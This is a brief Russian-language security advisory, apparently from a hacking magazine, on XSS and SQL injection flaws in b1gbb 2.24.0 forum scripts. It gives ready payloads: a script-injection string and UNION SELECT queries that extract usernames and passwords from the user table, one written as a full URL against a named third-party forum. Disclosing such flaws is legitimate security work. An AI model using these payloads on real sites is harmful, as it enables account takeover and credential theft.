Хакер #305. Многошаговые SQL-инъекции
Программа: b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Кроме того уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20
cebb_user%20%20where%20id=1/*
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20
cebb_user%20%20where%20id=1/*
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20
all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20
FROM%20cebb_user%20%20where%20id=1/*